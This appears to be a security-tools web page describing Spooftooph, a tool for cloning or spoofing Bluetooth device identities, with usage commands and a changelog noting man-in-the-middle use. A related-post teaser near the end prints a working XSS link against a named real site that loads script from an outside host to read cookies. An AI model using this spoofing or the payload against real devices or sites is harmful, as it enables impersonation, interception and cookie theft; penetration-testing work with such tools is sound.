Spooftooph is designed to automate spoofing or cloning Bluetooth device Name, Class, and Address. Cloning this information effectively allows Bluetooth device to hide in plain site. Bluetooth scanning software will only list one of the devices if more than one device in range shares the same device information when the devices are in Discoverable Mode (specificaly the same Address).

Spooftooph has several options for Bluetooth device information modification:

Option 1: Continuously scan an area for Bluetooth devices. Make a selection on which device in the list to clone. This option also allows for logging of the scanned devices.

Option 2: Randomly generate and assign valid Bluetooth interface information. The class and address are randomly generated and the name is derived from a list of the top 100 most common names in US and the type of device. For example if the randomly generated class is a phone, SpoofTooph might generate the name “Bob’s Phone”.

Option 3: Specify the name, class, and address a user wishes for the Bluetooth interface to have.

Option 4: Read in the log of previous scans and select a device to clone. Users can also manually add Bluetooth profiles to these log files.

Option 5: Incognito mode. Scan for and clone new devices at user assigned intervals.

This tool is heavily based on bdaddr (by Marcel Holtmann) and hciconfig (by Qualcomm Incorporated, Maxim Krasnyansky, and Marcel Holtmann) from BlueZ.

 

Download

Name: spooftooph-0.4.tar.gz
MD5: dbcc020aef5252aa17eee7b7af1c79eb
Download: Click Here

Log

v0.4 – 03/24/11 :

– Save file on exit.
– Fixed problem with saving log.
– Fixed problem with closing threads.
– Changed probes for device name. Scan runs much much faster now.

v0.3 – 02/14/11 :

– Fixed socket closing error
– Fixed log data verification for valid ADDR and CLASS
– Changed logging format to CSV: ADDR,CLASS,NAME
– Added -m flag for choosing multiple interfaces to use for cloning
(Useful to test Man-In-The-Middle attacks)
– Fixed the problem with reading in the Class from a log
– Fixed overflow problem with array of devices
– Fixed selection of Bluetooth interface from a always using interface hci0
– Changed device array to dynamically resize
– Added -b flag for specifying the number of Bluetooth devices to display per page

v0.1 – 03/03/10 :

– Initial release

Usage

To modify the Bluetooth adapter, spooftooth must be run with root privileges. Spooftooph offers five modes of usage:

1) Specify NAME, CLASS and ADDR.

> spooftooph -i hci0 -n new_name -a 00:11:22:33:44:55 -c 0x1c010c 

2) Randomly generate NAME, CLASS and ADDR.

> spooftooph -i hci0 -r

3) Scan for devices in range and select device to clone. Optionally dump the device information in a specified log file.

> spooftooph -i hci0 -s -d file.log

4) Load in device info from log file and specify device info to clone.

> spooftooph -i hci0 -l file.log

5) Clone a random devices info in range every X seconds.

> spooftooph -i hci0 -t 10

Explore More

critical XSS Vulnerability on Ygncos Shorten Url

PlanetCreator has reported another critical XSS Vulnerability on Ygncos Shorten Url : http://www.ygn.me This vulnerability has been informed to :- webmaster Test Link http://shorten.ygn.me/index.php?url=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E Cross-site scripting (XSS) is a type

Safe3 SQL Injector v5.1

Safe3 SQL Injector is one of the most powerful penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of back-end database servers.

Detecting New Rootkits

A new rootkit can either be one that has never been seen before, or one that uses new technologies or previously unused methods of attack. Or both. Andthat is where